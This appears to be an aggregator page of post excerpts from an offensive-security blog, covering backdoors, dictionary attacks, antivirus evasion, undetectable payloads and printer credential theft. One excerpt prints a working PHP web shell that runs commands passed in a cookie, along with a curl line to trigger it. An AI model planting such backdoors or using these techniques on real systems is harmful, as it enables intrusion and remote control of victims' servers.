Coresec - coresec.org - Coresec.org - Information Security Blog
General Information:
Latest News:
Permanent Reverse Backdoor for IPhone / IPad 24 Apr 2012 | 11:50 pm
During a security audit i have gained access to jailbroken iphone 4 by using ssh brute force attack. I was able to connect to the device using ssh and i tried to install a permanent reverse tcp backdo...
Windows Dictionary Attacks 15 Apr 2012 | 06:05 am
In this article, Scott Sutherland describes how to perform dictionary attacks against Active Directory accounts safely. Identify domains Enumerate domain controllers Enumerate users from domain contro...
PHP Stealth Backdoors 31 Mar 2012 | 07:57 am
1) Using cookie Select All Code:<?php @header(’Hidden-Field: '.@exec($_COOKIE['cmd'])); echo "<p>hello</p>"; ?> Example: curl ‘http://target/cookie.php’ -b ‘cmd=id’ -A ‘Mozilla/5.0 (Macintosh; U; Inte...
Cymothoa – Inject Shellcode into an existing process 24 Dec 2011 | 12:51 pm
Cymothoa is a stealth backdooring tool, that inject backdoor’s shellcode into an existing process. The tool uses the ptrace library (available on nearly all * nix), to manipulate processes and infect ...
Disabling AntiVirus during Pen Testing 6 Dec 2011 | 09:47 am
When penetration testing, and targeting Windows systems, writing some executable content to the file system is invariably required at some stage. Unfortunately today, the antivirus vendors have beco...
FUD Payload Generator for Backtrack 10 Nov 2011 | 11:28 am
Today based on Astr0baby’s article on how can we create a fully undetectable metasploit payload, i modified his REVERSE_TCP Payload Generator in order to work with Backtrack 5 distro. Below you can fi...
[Tip] OpenVAS Fast Start 10 Nov 2011 | 10:15 am
OpenVAS is a framework of several services and tools offering a comprehensive and powerful vulnerability scanning and vulnerability management solution. pen@test:~# apt-get install openvas pen@test:~#...
Intercepting Authentication Credentials Stored in Multifunction Printers 2 Nov 2011 | 06:57 am
During Defcon 19, percX from foofus.net discussed a new attack method against printers. This attack method involved tricking the printer into passing LDAP or SMB credential back to attacker in plain ...
Social Engineering Poll – Endearment vs Authority 13 Oct 2011 | 07:00 am
Endearment vs Authority This poll as based on two different stories. The first showed how the principle of endearment and how it may be used by a malicious social engineer. The second story involved ...
Generate and Manage Stealth PHP backdoors 9 Oct 2011 | 06:44 am
Weevely create and manage PHP trojan designed to be hardly detectable. Is a proof of concept of an unobtrusive PHP backdoor that simulate a complete telnet-like connection, hidden datas in HTTP refere...